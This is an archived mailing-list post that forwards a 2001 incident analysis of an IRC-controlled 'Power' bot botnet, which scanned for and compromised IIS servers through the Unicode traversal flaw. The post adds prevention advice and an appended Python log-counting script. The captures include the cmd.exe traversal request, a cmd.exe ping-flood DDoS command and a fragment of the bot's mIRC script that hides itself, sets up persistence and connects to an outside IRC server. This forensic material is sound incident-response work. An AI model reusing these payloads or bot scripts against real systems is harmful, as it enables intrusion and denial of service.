Halted..:Power[6731664986]!~Powerat_private PRIVMSG #XXXX :All UD
P Halted..:Power[4053275324]!~Powerat_private PRIVMSG #XXXX :All
UDP Halted..:Power[9201287277]!~Powerat_private PRIVMSG #XXXX :Al
l UDP Halted..:Power[8536771384]!~Powerat_private PRIVMSG #XXXX :
All UDP Halted..:Power[8705510295]!~Powerat_private PRIVMSG #XXXX
:All UDP Halted..:Power[9080084936]!~Powerat_private PRIVMSG #pow
er :All UDP Halted..:Power[6941998911]!~Powerat_private PRIVMSG #
power :All UDP Halted..

T 2001/06/06 00:38:21.840309 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
:Power[2236262189]!~Powerat_private PRIVMSG #XXXX :All UDP Halted
..
T 2001/06/06 00:58:49.455709 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
:XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :!info..

T 2001/06/06 00:58:49.660791 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
:Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[Windows 2000][1wk 3d
ays 7hrs 7mins 12secs][192.168.1.153][Power1.0]..

T 2001/06/06 00:58:49.944976 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
:Scanner[24]!~Powerat_private PRIVMSG #XXXXXX :[Windows 2000][2wks 6d
ays 2hrs 57mins 52secs][192.168.1.180][Power1.0]..

Request for webservers.txt (list of vulnerable IIS servers)

T 2001/06/06 05:09:13.401016 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
:XXXXXXX!~XXXXXXat_private PRIVMSG Scanner[65] :!raw dcc s
end XXXXXXX webservers.txt..

T 2001/06/06 05:09:13.533831 192.168.1.153:2818 -> 10.0.0.1:6667 [AP]
NOTICE XXXXXXX :DCC Send webservers.txt (192.168.1.153).

T 2001/06/06 05:09:14.051419 192.168.1.213:4039 -> 10.0.0.1:6667 [AP]
NOTICE XXXXXXX :DCC Send webservers.txt (192.168.1.213).

T 2001/06/06 05:09:14.141264 192.168.1.153:2818 -> 10.0.0.1:6667 [AP]
PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728921 4989 28971..

T 2001/06/06 05:09:14.562170 192.168.1.213:4039 -> 10.0.0.1:6667 [AP]
PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728981 3843 32793..

T 2001/06/06 05:09:18.843498 10.0.0.1:6667 -> 192.168.1.153:2818 [AP]
:XXXXXXX!~XXXXXXat_private PRIVMSG Scanner[208] :.DCC RESU
ME file.ext 4989 2130...

T 2001/06/06 05:09:18.844475 192.168.1.153:2818 -> 10.0.0.1:6667 [AP]
PRIVMSG XXXXXXX :.DCC ACCEPT file.ext 4989 2130..

T 2001/06/06 05:09:24.155118 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
:XXXXXXX!~XXXXXXat_private PRIVMSG Scanner[65] :!raw dcc s
end XXXXXXX webservers.txt..

T 2001/06/06 05:09:24.155118 10.0.0.1:6667 -> 192.168.1.153:2818 [AP]
:XXXXXXX!~XXXXXXat_private PRIVMSG Scanner[208] :!raw dcc send
XXXXXXX webservers.txt..

T 2001/06/06 05:09:24.170743 192.168.1.153:2818 -> 10.0.0.1:6667 [AP]
NOTICE XXXXXXX :DCC Send webservers.txt (192.168.1.153).
T 2001/06/06 05:09:24.251799 192.168.1.213:4039 -> 10.0.0.1:6667 [AP]
NOTICE XXXXXXX :DCC Send webservers.txt (192.168.1.213).

T 2001/06/06 05:09:24.730324 192.168.1.153:2818 -> 10.0.0.1:6667 [AP]
PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728921 3407 29000..

T 2001/06/06 05:09:24.839701 192.168.1.213:4039 -> 10.0.0.1:6667 [AP]
PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728981 2523 32793..
--------------------------------------------------------------------------

--------------------------------------------------------------------------
> 192.168.1.153 - - [06/Jul/2001:06:44:08 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
>
> Jul-06 05:30:26 192.168.1.213
>
> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

[Fri Jul 6 03:08:15 2001] [error] [client 192.168.1.180] File does not exist: /usr/sites/ben/htdocs/default/scripts/..Á^Ü../winnt/system32/cmd.exe
192.168.1.180 - - [06/Jul/2001:03:08:15 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
[Fri Jul 6 03:08:15 2001] [error] [client 192.168.1.180] File does not exist: /usr/sites/ben/htdocs/default/scripts/..Á^Ü../winnt/system32/cmd.exe
--------------------------------------------------------------------------

Hosts reported scanning off site:

192.168.1.153
192.168.1.153
192.168.1.213
192.168.1.180

On July 7, the following report was received:

--------------------------------------------------------------------------
Date: Sat, 07 Jul 2001 18:29:45 -0400
Subject: Re: [1775] Re: hack attempt from 192.168.1.213
From: XXXXXX
To: abuse@site

Thank you for the prompt follow-up to my message. In response to the
additional information you requested, the clock on my server is set to
the eastern daylight time, and is calibrated with Apple's time server.
This means the attack occurred at 3.45 am your time, on July 6th.
Here is the web log excerpt once again (same as in the first message):

192.168.1.213 - - [06/JUL/2001:06:45:33 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 186
--------------------------------------------------------------------------

The bot on this system has been actively scanning for quite some time, and
this status message occurs prior to the report by XXXXXX.

--------------------------------------------------------------------------
T 2001/06/06 03:44:18.685984 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
:XXXXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :!scan status..

T 2001/06/06 03:44:19.273885 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
:Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP:
208.32.8.164][Port: 80][Found: 1279]..:Scanner[24]!~Powerat_private
0 PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 24.20.93.125][Port: 80][Found: 16
55]..
--------------------------------------------------------------------------

At this point, it is up to 2934 vulnerable systems.

At 00:15:31 on July 6, someone on the host 10.20.1.1 uploads a set of new
programs to the host 192.168.16.108:

--------------------------------------------------------------------------
T 2001/06/06 00:38:34.043659 10.20.1.1:3210 -> 192.168.1.213:12624 [AP]
password..

T 2001/06/06 00:38:35.567124 10.20.1.1:3210 -> 192.168.1.213:12624 [AP]
*?!?PL.

T 2001/06/06 00:38:38.827927 10.20.1.1:3210 -> 192.168.1.213:12624 [AP]
*?!?CM001B0110.2.

T 2001/06/06 00:38:48.360328 10.20.1.1:3211 -> 192.168.1.213:4836 [AP]
0000004923C:\wins.ava.

T 2001/06/06 00:38:48.538066 10.20.1.1:3211 -> 192.168.1.213:4836 [A]
alias connect { .server dysfunction-1.mine.nu 6667 }..on 1:start:{..
run hexplore.exe /hide mIRC*..writeini c:\winnt\win.ini windows run $m
ircexe...timerwriteini 0 30 writeini c:\winnt\win.ini windows run $mir
cexe.. nick Scanner[208].. .server dysfunction-1.mine.nu 6667..
  .timerconnect 0 30 connect..write -c webservers.txt..if (%scanning != done) { .http 208.1.1.1 | halt }..}..on 1:connect:{.. timerconnect off.. join #XXXXXX %key..}..on 1:disconnect:{.. server dysfunction-1.mine.nu 6667.. .timerconnect 0 30 connect..}..on 1:t
  . . .
--------------------------------------------------------------------------

This shows the uploading of files found on other systems, in this case
"wins.ava". The word "password" is also seen as the key value in the
"remote.ini" file shown earlier. The file upload protocol thus uses
12684/tcp to initiate the transfer, followed by the file contents being
sent on 4836/tcp.

Around midnight on the morning of July 6, XXXXX is talking with XXXXXXX
about their scanning efforts. XXXXX makes an estimate of how long the
scanning will take:

--------------------------------------------------------------------------
T 2001/06/06 00:13:41.244701 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
  :XXXXX!~XXXXXXat_private PRIVMSG #XXXX :and it will take them 24 hours to scan the whole ip range..
--------------------------------------------------------------------------

A few minutes later, XXXXX checks the status and sees they have detected
"almost 1000" vulnerable Windows IIS servers.

--------------------------------------------------------------------------
T 2001/06/06 00:58:54.622797 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :!scan status..

T 2001/06/06 00:58:54.821043 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :Scanner[24]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 24.4.84.108][Port: 80][Found: 319]..

T 2001/06/06 00:58:55.156010 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 208.5.220.86][Port: 80][Found: 320]..

T 2001/06/06 00:59:03.677652 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :almost 1000..
T 2001/06/06 00:59:09.126971 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :and we aren't even close..

T 2001/06/06 00:59:15.598770 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :we are gonna own more than we though..

T 2001/06/06 00:59:19.374231 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :i bet 100thousand..

T 2001/06/06 01:00:21.989645 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :!scan status..

T 2001/06/06 01:00:22.580477 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 208.6.23.6][Port: 80][Found: 323]..:Scanner[24]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 24.4.120.131][Port: 80][Found: 336]..
--------------------------------------------------------------------------

Four hours later he checks again and the number is now over 5000...

--------------------------------------------------------------------------
T 2001/06/06 05:53:48.655820 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :Scanner[24]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 24.32.138.95][Port: 80][Found: 2794]..:Scanner[208]!~Powerat_private 3 PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 208.52.239.2][Port: 80][Found: 2486]..
--------------------------------------------------------------------------

Eleven hours after they first discussed the scanning, the total is up to
7106:

--------------------------------------------------------------------------
T 2001/06/06 11:32:30.030794 10.40.4.4:6667 -> 192.168.1.213:2696 [AP]
  :Scanner[129]!~Power@XXXXXXXXXXXXXXXXXXXXXXXXXX PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 129.3.238.195][Port: 80][Found: 34]..:Scanner[128]!~Power@XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 128.4.245.228][Port: 80][Found: 67]..:Scanner[24]!~Power@XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 24.65.82.42][Port: 80][Found: 3580]..:Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 208.105.156.156][Port: 80][Found: 3425]..
--------------------------------------------------------------------------

Cleaned up, the hosts logged to be scanning from the site at this time
are:

--------------------------------------------------------------------------
XXXXXXXXXXXXXXXXXX [IP: 129.1.12.219][Port: 80][Found: 0]
XXXXXXXXXXXXXXXXXX [IP: 128.3.176.105][Port: 80][Found: 67]
XXXXXXXXXXXXXXXXXX [IP: 24.63.61.129 ][Port: 80][Found: 3580]
XXXXXXXXXXXXXXXXXX [IP: 65.95.111.222][Port: 80][Found: 4080]
--------------------------------------------------------------------------

The total as of 11:32:29 is up to 7727.

It is estimated that during this period, responses (most failures or
error messages) were received from 388428 web servers off site. (It is
not yet known how many attempted connections were made.)

On July 8, 2001, a DDoS attack can be seen sourced from 192.168.1.225:

--------------------------------------------------------------------------
T 2001/06/08 02:20:09.406262 10.80.8.8:2585 -> 192.168.1.225:80 [AP]
  GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+30000+10.10.10.10+"-n"+9999+"-w"+10..
I 2001/06/08 02:20:09.430676 192.168.1.225 -> 10.10.10.10 8:0 7303@0:1480
  ...c....abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnop
  qrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopq
  rstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqr
  stuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrs
  tuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrst
  uvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstu
  vwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuv
  wabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvw
  abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwa
  bcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwab
  cdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabc
  defghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcd
  efghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcde
  fghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdef
  ghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefg
  hijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefgh
  ijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghi
  jklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghij
  klmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijk
  lmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijkl
  mnopqrstuvwabcdefghijklmnopqrstuvwabcdefghi....
  ..........
--------------------------------------------------------------------------

The following report was received on July 8:

--------------------------------------------------------------------------
Date: Sun, 8 Jul 2001 18:29:54 -0700 (PDT)
Message-Id: <200107090129.f691Tsa32678@site>
To: abuse@site
From: someone@othersite
Subject: attack

. . .
Problem or question:

I believe a computer at your site was used to compromise a web server
located at ...  After reviewing the web server logs, I found the
following repeated entry:

2001-07-06 09:28:18 192.168.1.180 - GET /scripts/..\../winnt/system32/cmd.exe 200 - - -

A DNS lookup suggests that IP 192.168.1.180 is a computer on the XXXX's
network. It appears that someone is exploiting a well-known vulnerability
in the IIS web server. The hacker was successful, as some files were
successfully uploaded to the machine (mirc32.exe).
--------------------------------------------------------------------------

The host reported to be scanning was scanning that IP range (24.0.0.0/8)
at the time (although it was not being logged), so this likely does
correlate:

--------------------------------------------------------------------------
XXXXXXXXXXXXXXXXX [IP: 24.63.61.129 ][Port: 80][Found: 3580]
--------------------------------------------------------------------------

Successful exploitation of the Windows IIS Unicode vulnerability during
scanning results in a directory listing from the web server. These look
like the following (as seen using "ngrep"):

--------------------------------------------------------------------------
# ngrep -q -I 192.168.1.22.0706-0708.dump "Volume in drive" | less
input: 192.168.1.22.0706-0708.dump

T 24.1.2.196:80 -> 192.168.16.108:3821 [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Fri, 06 Jul 2001 04:10:26 GMT..Content-Type: application/octet-stream..Volume in drive C has no label...Volume Serial Number is 7C24-D411....

T 24.1.2.192:80 -> 192.168.16.108:3817 [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Fri, 06 Jul 2001 06:50:58 GMT..Content-Type: application/octet-stream..Volume in drive C has no label...Volume Serial Number is 047C-3309....
T 24.1.4.197:80 -> 192.168.16.108:4330 [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Fri, 06 Jul 2001 07:06:49 GMT..Content-Type: application/octet-stream..Volume in drive C has no label...Volume Serial Number is 0CFD-B8DA....

T 24.1.5.198:80 -> 192.168.16.108:4585 [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Fri, 06 Jul 2001 07:13:44 GMT..Content-Type: application/octet-stream..Volume in drive C has no label...Volume Serial Number is CC72-B0EE....
. . .
--------------------------------------------------------------------------

Using this signature, counting the entries logged from traffic to/from a
limited subset of the known compromised systems gives 9106 off-site
systems compromised:

--------------------------------------------------------------------------
# ngrep -q -I 192.168.1.22.0706-0708.dump "Volume in drive" | grep " -> " | awk '{ print $2;}' | sed "s/:80//" | sort | uniq > exploited-iis
# wc -l exploited-iis
9106 exploited-iis
--------------------------------------------------------------------------

The logs examined do not include traffic to/from two of four hosts known
to be scanning, so the 9106 figure is likely an undercount of compromises
resulting from scanning activity on these systems.

On July 10, XXXXX reported another DDoS attack, this time involving 44
systems. The target was XXXXXXXXXXXX, and the total outbound flow rate
exceeded 50 Mbps for over two hours.

In all, the following systems have been identified as scanning, relaying
IRC traffic, or involved in DDoS attacks:

[71 hosts deleted]

Prevention
----------

CERT Advisory 2001-11 contains information on preventative measures:

http://www.cert.org/advisories/CA-2001-11.html

In addition, XXXXXX relayed the following preventative measures for IIS
servers to pass along to administrators.
--------------------------------------------------------------------------
There are a couple of simple steps that NT admins should take that will
significantly increase the "degree of difficulty" in compromising NT
boxes - doing these things can at least reduce the number of incidents
we respond to:

1. On an IIS server, always change the location of the inetpub directory
   and its subordinates (wwwroot, ftproot, etc.) from the default
   (C:\InetPub) to a different logical partition. The "../.." attack's
   syntax is not capable of changing drives to access
   %SystemRoot%\system32.

2. Restrict anonymous access to the registry. This greatly reduces the
   amount of information available to a non-authenticated user about
   the target system.

   To do this in Windows 2000:

   a. In Administrative Tools, open Local Security Policy.
   b. In the Tree Window, expand Local Policies and choose Security
      Options.
   c. Double-click "Additional restrictions for anonymous connections".
   d. In the Local Policy Setting dropdown, choose "No access without
      explicit anonymous permissions".

   In Windows NT 4, a registry hack needs to be applied:

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
   Value: REG_DWORD RestrictAnonymous = 1

There are some consequences to using the anonymous restrictions, which
mostly apply to Domain Controllers. Use of these settings on DCs
requires that the admin read up on them.
--------------------------------------------------------------------------

--
Dave Dittrich                           Computing & Communications
dittrichat_private                      University Computing Services
http://staff.washington.edu/dittrich    University of Washington

PGP key      http://staff.washington.edu/dittrich/pgpkey.txt
Fingerprint  FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5

----- End forwarded message -----

--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
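As an added worked example (it is not part of Dave Dittrich's analysis above and not code from the Power bot or mIRC), the following Python script generalizes the two counting steps the forwarded report performs by hand: it reassembles "ngrep -q" output into one record per packet, pulls the latest "[SCAN][Status: ][IP: ...][Port: 80][Found: N]" counter reported by each Scanner[...] nick over the IRC control channel and sums them the way the report tracks its 2934 / 5000 / 7106 / 7727 totals, and applies the "Volume in drive" directory-listing signature to count distinct responding IIS servers, the same result the report's ngrep | grep | awk | sed | sort | uniq pipeline produces. It assumes ngrep's default payload layout (two-space indent, fixed-width wrapping, non-printables shown as '.'). The embedded sample records are constructed in that format and are not lines from the capture; the hostmasks, channel name and volume serial numbers are placeholders.

```python
import re

# ngrep -q prints one header line per matching packet, e.g.
#   T 2001/07/06 05:53:48.655820 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
# (timestamp only with -t), then the payload indented two spaces, wrapped
# at a fixed width, with non-printable bytes such as CR/LF shown as '.'.
HEADER_RE = re.compile(
    r"^(?P<proto>[TUI]) (?:(?P<ts>\d{4}/\d\d/\d\d \S+) )?"
    r"(?P<src>\S+) -> (?P<dst>\S+)(?: (?P<rest>.*))?$"
)

# One Power bot status report relayed by a scanner drone over IRC.
STATUS_RE = re.compile(
    r":(?P<nick>Scanner\[\d+\])!\S+ PRIVMSG \S+ :"
    r"\[SCAN\]\[Status: [^\]]*\]\[IP: (?P<ip>[^\]]+)\]"
    r"\[Port: (?P<port>\d+)\]\[Found: (?P<found>\d+)\]"
)

def parse_ngrep(text):
    """Reassemble ngrep -q output into (header_fields, payload) records.
    Wrapped lines are joined with no separator, because ngrep breaks
    mid-token ("[IP: 2" / "4.4.84.108]" must become one address)."""
    records, header, payload = [], None, []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            if header is not None:
                records.append((header, "".join(payload)))
            header, payload = m.groupdict(), []
        elif header is not None and line.startswith("  "):
            payload.append(line[2:])  # strip only ngrep's two-space indent
    if header is not None:
        records.append((header, "".join(payload)))
    return records

def scan_status(text):
    """Most recent [SCAN] report per scanner nick seen on the control channel."""
    latest = {}
    for _hdr, payload in parse_ngrep(text):
        for m in STATUS_RE.finditer(payload):
            latest[m["nick"]] = {"ip": m["ip"], "port": int(m["port"]),
                                 "found": int(m["found"])}
    return latest

def scan_total(text):
    """Sum of each scanner's latest Found counter (the report's running total)."""
    return sum(s["found"] for s in scan_status(text).values())

def exploited_iis(text):
    """Distinct IIS servers whose reply to the cmd.exe probe was a DIR listing,
    i.e. the report's ngrep | awk | sed | sort | uniq pipeline: the responder
    is the packet source minus its ':80' suffix. Returns {host: Server banner};
    a 404 reply carries no listing and is skipped."""
    hosts = {}
    for hdr, payload in parse_ngrep(text):
        if hdr["proto"] != "T" or "Volume in drive" not in payload:
            continue
        banner = re.search(r"Server: (.*?)\.\.", payload)
        hosts[hdr["src"].rsplit(":", 1)[0]] = banner.group(1) if banner else ""
    return hosts

# Constructed samples in ngrep -q output format (not lines from the capture);
# the IRC hostmasks, channel name and volume serial numbers are placeholders.
SAMPLE_IRC = """\
T 2001/07/06 00:58:54.821043 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :Scanner[24]!~Power@drone-a PRIVMSG #chan :[SCAN][Status: ][IP: 2
  4.4.84.108][Port: 80][Found: 319]..
T 2001/07/06 00:58:55.156010 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :Scanner[208]!~Power@drone-b PRIVMSG #chan :[SCAN][Status: ][IP: 208.5
  .220.86][Port: 80][Found: 320]..
T 2001/07/06 05:53:48.655820 10.0.0.1:6667 -> 192.168.1.213:4039 [AP]
  :Scanner[24]!~Power@drone-a PRIVMSG #chan :[SCAN][Status: ][IP: 24.32.
  138.95][Port: 80][Found: 2794]..:Scanner[208]!~Power@drone-b PRIVMSG #c
  han :[SCAN][Status: ][IP: 208.52.239.2][Port: 80][Found: 2486]..
"""

SAMPLE_HTTP = """\
input: constructed.dump
T 24.1.2.196:80 -> 192.168.16.108:3821 [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Content-Type: application/oc
  tet-stream..Volume in drive C has no label...Volume Serial Number is 0000-0000....
T 24.1.2.192:80 -> 192.168.16.108:3817 [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Content-Type: application/oc
  tet-stream..Volume in drive C has no label...Volume Serial Number is 0000-0000....
T 24.1.2.196:80 -> 192.168.16.108:3990 [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Content-Type: application/oc
  tet-stream..Volume in drive C has no label...Volume Serial Number is 0000-0000....
T 24.1.4.197:80 -> 192.168.16.108:4001 [AP]
  HTTP/1.1 404 Object Not Found..Server: Microsoft-IIS/5.0..Content-Type
  : text/html..
"""

if __name__ == "__main__":
    for nick, s in scan_status(SAMPLE_IRC).items():
        print(f"{nick:13s} last target {s['ip']:15s} found {s['found']}")
    print("running total of hosts found:", scan_total(SAMPLE_IRC))
    for host, banner in exploited_iis(SAMPLE_HTTP).items():
        print(f"DIR listing returned by {host} ({banner})")
    print("distinct exploited IIS servers:", len(exploited_iis(SAMPLE_HTTP)))
```

To run it against a real capture, read the output of "ngrep -q -t -I file.dump" into a string and pass it to scan_status() or exploited_iis(); the timestamp field is optional in the header pattern, so output produced without -t parses the same way. The two counts answer different questions: scan_total() reproduces the per-drone counters the operators themselves watched, while exploited_iis() counts servers actually seen answering with a listing, which is why the report treats the signature-based 9106 figure as the firmer one and still calls it an undercount because two of the four scanning hosts were not in the logs.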
This archive was generated by hypermail 2b30 : Thu Aug 09 2001 - 13:33:32 PDT